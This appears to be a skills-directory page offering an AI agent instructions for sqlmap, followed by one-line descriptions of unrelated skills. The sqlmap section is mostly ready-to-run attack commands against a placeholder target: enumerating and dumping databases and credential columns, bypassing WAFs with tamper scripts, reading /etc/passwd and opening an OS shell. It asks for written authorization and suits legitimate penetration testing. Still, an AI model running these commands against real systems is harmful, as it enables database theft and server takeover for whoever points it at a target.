> sqlmap
Detect and exploit SQL injection with sqlmap. Use when a user asks to test for SQL injection, extract database contents, bypass authentication via SQLi, automate injection testing, or dump database schemas.
curl "https://skillshub.wtf/TerminalSkills/skills/sqlmap?format=md"sqlmap
Overview
sqlmap automates SQL injection detection and exploitation. It supports all major databases (MySQL, PostgreSQL, MSSQL, Oracle, SQLite), all injection techniques (boolean-blind, time-blind, error-based, UNION, stacked queries), and can extract entire databases, read/write files on the server, and execute OS commands through SQL injection.
Instructions
Step 1: Basic Detection
# Test a URL parameter for SQL injection
sqlmap -u "https://target.example.com/products?id=1" --batch
# --batch: use defaults for all prompts (non-interactive)
# Test POST parameters
sqlmap -u "https://target.example.com/login" \
--data="username=admin&password=test" \
--batch
# Test with cookies and headers (authenticated sessions)
sqlmap -u "https://target.example.com/api/user?id=1" \
--cookie="session=abc123" \
--headers="Authorization: Bearer eyJ..." \
--batch
# Specify which parameter to test
sqlmap -u "https://target.example.com/search?q=test&category=1&page=1" \
-p "category" \
--batch
Step 2: Database Enumeration
# List all databases
sqlmap -u "https://target.example.com/products?id=1" --dbs --batch
# List tables in a database
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db --tables --batch
# List columns in a table
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db -T users --columns --batch
# Dump specific columns (e.g., credentials)
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db -T users -C "username,email,password_hash" --dump --batch
# Dump everything (use cautiously)
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db --dump-all --batch
Step 3: Advanced Techniques
# Specify injection technique
sqlmap -u "https://target.example.com/products?id=1" \
--technique=BT --batch
# B: Boolean-blind, T: Time-blind, E: Error-based
# U: UNION, S: Stacked queries, Q: Inline queries
# Tamper scripts for WAF bypass
sqlmap -u "https://target.example.com/products?id=1" \
--tamper=space2comment,between,randomcase \
--random-agent --batch
# space2comment: replaces spaces with /**/
# between: replaces > with NOT BETWEEN 0 AND
# randomcase: randomizes keyword case
# Test REST API JSON parameters
sqlmap -u "https://target.example.com/api/search" \
--data='{"query":"test","limit":10}' \
--content-type="application/json" \
-p "query" --batch
# Level and risk increase (deeper testing)
sqlmap -u "https://target.example.com/products?id=1" \
--level=5 --risk=3 --batch
# level 5: tests cookies, User-Agent, Referer, all params
# risk 3: includes heavy time-blind and OR-based tests
Step 4: Post-Exploitation
# Read files from server (if DB user has FILE privilege)
sqlmap -u "https://target.example.com/products?id=1" \
--file-read="/etc/passwd" --batch
# Get an OS shell (stacked queries + privileges needed)
sqlmap -u "https://target.example.com/products?id=1" \
--os-shell --batch
# Get a SQL shell
sqlmap -u "https://target.example.com/products?id=1" \
--sql-shell --batch
# Check current DB user and privileges
sqlmap -u "https://target.example.com/products?id=1" \
--current-user --current-db --is-dba --batch
Step 5: Crawl and Test Entire Application
# Crawl the site and test all found parameters
sqlmap -u "https://target.example.com/" \
--crawl=3 --batch --forms
# --crawl=3: follow links up to depth 3
# --forms: test HTML form parameters too
# Use a Burp/ZAP request file
sqlmap -r captured-request.txt --batch
# captured-request.txt is a raw HTTP request file
Guidelines
- Always have written authorization. SQL injection testing against unauthorized targets is illegal.
- Start with
--batch --level=1 --risk=1(defaults). Increase level/risk only if needed. --batchmode is essential for automation — prevents interactive prompts.- Time-blind injection is slow. Use
--threads=10to speed up extraction. - Tamper scripts bypass WAFs. Common:
space2comment,between,charencode,randomcase. - Use
-r request.txtwith Burp Suite exported requests for complex auth flows. --dumpextracts data. In a real pentest, dump only what proves the vulnerability — not the entire database.- sqlmap auto-detects the DBMS. Use
--dbms=mysqlto skip detection (faster).
> related_skills --same-repo
> zustand
You are an expert in Zustand, the small, fast, and scalable state management library for React. You help developers manage global state without boilerplate using Zustand's hook-based stores, selectors for performance, middleware (persist, devtools, immer), computed values, and async actions — replacing Redux complexity with a simple, un-opinionated API in under 1KB.
> zod
You are an expert in Zod, the TypeScript-first schema declaration and validation library. You help developers define schemas that validate data at runtime AND infer TypeScript types at compile time — eliminating the need to write types and validators separately. Used for API input validation, form validation, environment variables, config files, and any data boundary.
> xero-accounting
Integrate with the Xero accounting API to sync invoices, expenses, bank transactions, and contacts — and generate financial reports like P&L and balance sheet. Use when: connecting apps to Xero, automating bookkeeping workflows, syncing accounting data, or pulling financial reports programmatically.
> windsurf-rules
Configure Windsurf AI coding assistant with .windsurfrules and workspace rules. Use when: customizing Windsurf for a project, setting AI coding standards, creating team-shared Windsurf configurations, or tuning Cascade AI behavior.